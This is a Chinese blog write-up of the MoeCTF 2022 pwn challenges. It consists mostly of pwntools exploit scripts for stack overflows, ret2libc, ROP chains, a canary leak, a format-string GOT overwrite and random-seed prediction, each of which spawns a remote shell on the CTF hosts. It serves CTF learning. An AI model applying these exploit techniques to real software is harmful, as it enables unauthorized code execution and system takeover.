[MoeCTF 2022] PWN复现

已于 2023-10-13 18:07:45 修改
阅读量1.2k 收藏 4
点赞数 5
分类专栏: PWN 文章标签: 网络安全
于 2023-08-16 17:58:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/132324001
版权

目录

ret2text

ret2libc

rop32

rop64

filedes

endian

border

buffer overflow

babyfmt

random

ret2text

 发生了明显的溢出,并且也发现了有后面函数,可以直接溢出,exp如下:

from pwn import *

io =remote('node1.anna.nssctf.cn',28287)

backdoor =0x4014BA
ret =0x40101a

payload =b'A'*(0X40 +8) +p64(ret) +p64(backdoor)

io.sendline(payload)
io.interactive()
ret2libc

很传统的经典题型,利用puts泄露libc

from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux') 

# io = process(pwnfile)
io = remote('node3.anna.nssctf.cn',28546)
elf =ELF('./111')
 
got_addr = elf.got['puts']
plt_addr = elf.plt['puts']
main_addr = 0x4011A8
rdi_addr = 0x40117e
ret_addr  = 0x40101a

payload = b'a'*(0x40 +8) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)
io.sendline(payload)

puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
print('puts_addr:',hex(puts_addr))

#put_addr =u64(io.recv(6).ljust(8,b'\x00'))
#print(hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload = b'a'*(0x40 +8) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)

io.sendline(payload)
io.interactive()
rop32

 因为这里可以直接call system,并且还有binsh,直接构造就完事了,exp如下:

from pwn import *
context(log_level='debug',arch='amd64', os='linux')

#io = process(pwnfile)
io = remote('node3.anna.nssctf.cn',28903)

bin_addr =0x804C024
sys_addr =0x80491E7
payload =b'A'*(0x1c +4) +p32(sys_addr) +p32(bin_addr)

io.sendline(payload)
io.interactive()
rop64

因为保护机制开启了canary,所以首先要绕过,才好开展后续工作

 这里可以直接泄露canary的地址,并且canary =0x28,后续就是经典的套路了 

from pwn import *
# from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')

pwnfile= './111'
# p = process(pwnfile)
p = remote("node1.anna.nssctf.cn",28912)

payload1 = b'a'*0x29   # canary=0x30-0x8 ,因为要溢出canary,所以要加一,为0x29
p.sendafter(b"Go Go Go!!!\n", payload1)

p.recvuntil(b'a'*0x29)
canary = u64(p.recv(7).rjust(8, b'\x00'))
print(hex(canary))

rdi_addr = 0x4011de
ret_addr = 0x40101a
system = 0x401284
binsh = 0x404058

payload =b'a'*0x28 + p64(canary) + b'a'*8 +p64(rdi_addr) +p64(binsh) +p64(system)

p.send(payload)
p.interactive()
filedes

这题的知识点比较偏吧,文件的标准输出流

 

endian

这题因为反汇编里面说了需要输入两个整数,再加上小端序的缘故,所以要倒过来,exp如下:

#https://www.sojson.com/hexadecimal.html  进制转换


from pwn import *

p = remote("node3.anna.nssctf.cn",28598)

payload = 0x616b694d    #  akiM
p.sendline(str(payload))
payload = 0x424e6f74    #  BNot
p.sendline(str(payload))

p.interactive()
border

 再加上,要输出溢出的长度,求出两间的距离

 


from pwn import *
context(log_level='debug',arch='amd64', os='linux')

io = remote('1.14.71.254',28780 )

io.recvuntil('length:')
io.sendline(b"32")
io.recvuntil('content:')
io.send(b"a"*32)

io.interactive()

buffer overflow

 需要点逆向的能力,看代码,可知

from pwn import *
context(log_level='debug',arch='amd64', os='linux')

#io = process(pwnfile)
io = remote('node2.anna.nssctf.cn',28309)
elf = ELF('./111')
rop = ROP('./111')

io.recvuntil('Write down your note:\n')

payload = b'a'*70 + b'Limiter and Wings are beautiful girls!\x00'

io.send(payload)
io.interactive()
babyfmt

 已经告诉了后面函数,但是发生了格式字符串漏洞,可以通过运行程序找到偏移,exp如下:

from pwn import *

p = remote('node1.anna.nssctf.cn',28931)
elf = ELF('./111')

printf_got = elf.got["printf"]
p.recvuntil("\n")
p.sendline("%10$s")

backdoor = int(p.recv(10),16)

payload = fmtstr_payload(11,{printf_got:backdoor})

p.sendline(payload)
p.interactive()
random

这题就是随机数,时间做种子,来解决,这里我有点不明白接收一下 b'a'*0x20,没有看明白

from pwn import *
from ctypes import *

p = remote("node2.anna.nssctf.cn",28497)  #process(program)
elf = ELF('./111')

payload =b'a'*0x20
p.sendafter("username: ",payload)
payload = b'ls_4nyth1n9_7ruIy_R4nd0m?\x00'
p.sendlineafter("password: ",payload)

p.recvuntil("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
seed = u64(p.recvline(b"\x7f")[-6:].ljust(8, b'\x00'))
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

libc.srand(seed)
v3 = libc.rand()
v4 = libc.rand() ^ v3
v5 = libc.rand()
libc.srand(v4 ^ v5)
libc.rand()
libc.rand()
libc.rand()
v8 = libc.rand()
p.sendlineafter("Please tell me the number you guess now.\n",str(v8))

p.interactive()

Xzzzz911
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
MoeCTF2023_Pwn
m0_75094067的博客
10-14 271
MoeCTF2023_Pwn
NSSCTF题库[MoeCTF 2021-2022]系列
J1ng_Hong的博客
08-08 1392
环境页面,让我们直接来查看源码就完事了看它的完成条件,白给题。
[MoeCTF 2022]ezphp writeup
The_YSZL的博客
08-23 400
flag=’xxxxxxx‘可不是代表flag的值是xxx,这段代码是通过第一行的代码:highlight_file('source.txt');把source.txt中的内容显示在了界面上,真实flag的值隐藏了起来,这里专门写出的意义是提醒同学们最后要得到的flag在$flag中。实际的过程是$a = $flag,随后$flag = $a = $flag,即flag的值没有发生变化,且满足上述的需求。对于每个键值对,将值作为变量名,并将对应变量的值赋给当前循环的变量。值得注意的是这里的判断是===。
moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2488
title: 【moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web Python 【moeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
MoeCTF2022 部分Crypto 复现
Luiino的博客
11-05 2838
用基础方法解不出来,原因是e与phi_n不互素,又phi_n = (p-1)*(q-1),求gcd(e,(p-1))和gcd(e,(q-1)),发现e与p-1互素。choice用法:从非空序列中随机选取一个数据并带回,该序列可以是list、tuple、str、set。,计算delt + N是否为完全平方数,如果为完全平方数,那么delt + N =Wilson定理:如果p是素数,则(p − 1)!可以知道p、q相近,则|p-q|很小,进而。因此,我们可以爆破差值delt,即。与 N 相差很小,从而。
强网杯2022 pwn 赛题解析.docx
12-18
强网杯
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
07-11
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
2024NKCTF-pwn
03-25
2024NKCTF_pwn
部分ctf-web题解
weixin_66669317的博客
12-06 1401
ctfweb部分题解
pwn篇:随机数种子
weixin_44644249的博客
02-02 1048
攻防世界pwn进阶:dice_game 程序分析: 64位elf可执行文件、libc.so.6库文件 保护:除了Canary,其他保护全开 IDA分析程序逻辑 创建一个随机数种子,为当前时间 首先输入名字,长度为55的数组。程序对输入做了处理,当大于49长度时,将最后一个赋值为“0x00”,也就是对字符串长度进行了限制,这个函数没什么问题。 打印输入的字符串,这里也没什么问题。 调用了srand函数,seed是输入名字时字符串第0x41个元素,也就是该值可控。 SUB_A20函数对随机数进行了处理,
2022Paradigm.ctf】random writeup
Rorschach:Blog
08-22 927
区块链智能合约相关题目
Writeup-moectf-ezphp
DoubleLiii的博客
10-27 909
moectf web方向一个题
[moeCTF 2023] pwn
weixin_52640415的博客
10-25 324
总体上来说并不难,不过对于新生来说还是相当好的。循序渐进,很适合PWN入门到放弃。
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 4486
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界的PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数: rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8286
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
操作系统期末复习笔记!
最新发布
06-13
操作系统期末复习笔记
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值